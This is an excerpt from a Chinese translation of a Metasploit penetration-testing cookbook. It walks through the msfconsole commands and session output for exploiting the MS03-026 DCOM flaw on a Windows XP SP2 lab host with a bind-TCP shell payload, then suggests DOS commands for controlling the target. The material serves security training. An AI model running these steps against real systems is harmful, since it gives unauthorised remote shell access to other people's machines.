《Metasploit渗透测试手册》—第3章3.4节绑定远程访问目标机器的shell

本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第3章3.4节绑定远程访问目标机器的shell,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。

3.4 绑定远程访问目标机器的shell
Metasploit渗透测试手册
在前面内容中,分析了怎样对Windows SP2进行攻击渗透,并在其上添加新的用户账号,但是在执行该漏洞利用代码之后,连接也终止了。在本节中,将实现向目标机器绑定shell,以便建立与目标机器的远程连接并对其进行远程控制。工作过程和前面讲过的类似,使用不同的攻击载荷,执行后将在目标机器上打开远程连接shell。

准备
从启动msfconsole开始,目标与在Windows XP SP2上进行渗透测试的目标相同,使用的漏洞同样也是dcom漏洞,区别是使用不同的攻击载荷,本次选用的攻击载荷可以生成绑定到目标主机的shell。

怎样实现
若要向目标主机绑定shell,需要执行如下几个步骤。

(1)针对目标机器,选择dcom漏洞利用代码,设置不同的参数,然后选择攻击载荷。

msf > use exploit/windows/dcerpc/ms03_026_dcom 
msf  exploit(ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                      yes       The target address
   RPORT  135                yes        The target port
Exploit target:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf  exploit(ms03_026_dcom) > set RHOST 192.168.56.102
RHOST => 192.168.56.102

(2)漏洞利用代码相关参数设置完成后,接下来就是攻击载荷。使用show payloads命令可以列出所有可用的攻击载荷。选择windows/shell/bind_tcp,该攻击载荷将在目标机器的4444端口(默认情况)打开TCP连接,并向攻击者提供命令shell。

msf  exploit(ms03_026_dcom) > set PAYLOAD windows/shell/bind_tcp 
PAYLOAD => windows/shell/bind_tcp

(3)使用show options命令,并设置其他相关参数,例如RHOST。还可以修改缺省的端口号,参数设置完成后,便可以执行该漏洞利用代码。下面展示的是代码执行后的输出情况。

msf  exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.56.101:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.101:4444 -> 
192.168.56.102:1052) at 2011-10-31 01:55:42 +0530
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

从以上信息可以看出,漏洞利用代码成功执行,新的命令行提示符已经在msfconsole中启动,攻击者可以利用这一新的会话远程获取对目标机器的完全访问权限。如果需要退出该会话,可以使用exit命令。

读者现在可能已经认识到Metasploit中攻击载荷的强大,为更好地理解其攻击载荷的功能,强烈建议读者对其进行更多的尝试。

怎样工作
Dcom漏洞利用代码的工作原理和前面讲过的是相同的。bindtcp的工作过程涉及后面章节将要介绍的一些概念,以便对其工作过程有更好的理解。读者也可以查阅该攻击载荷的ruby代码,见/pentest/exploits/framework3/modules/payloads/stagers/windows/bind tcp.rb。

更多
接下来要学习怎样通过shell对目标主机进行控制。

实现对目标的完全控制
建立与目标机器的shell连接,然后使用命令行提示符对目标机器进行完整的访问和控制。可使用一些常用的DOS命令对目标机器进行探索,包括目录列表、文件与文件夹复制、创建用户代理等一些基本操作。

本文仅用于学习和交流目的,不代表异步社区观点。非商业转载请注明作译者、出处,并保留本文的原始链接。

上一篇:在Hyper-V上安装配置Windows负载均衡NLB


下一篇:ECS训练营Day3SLB负载均衡实践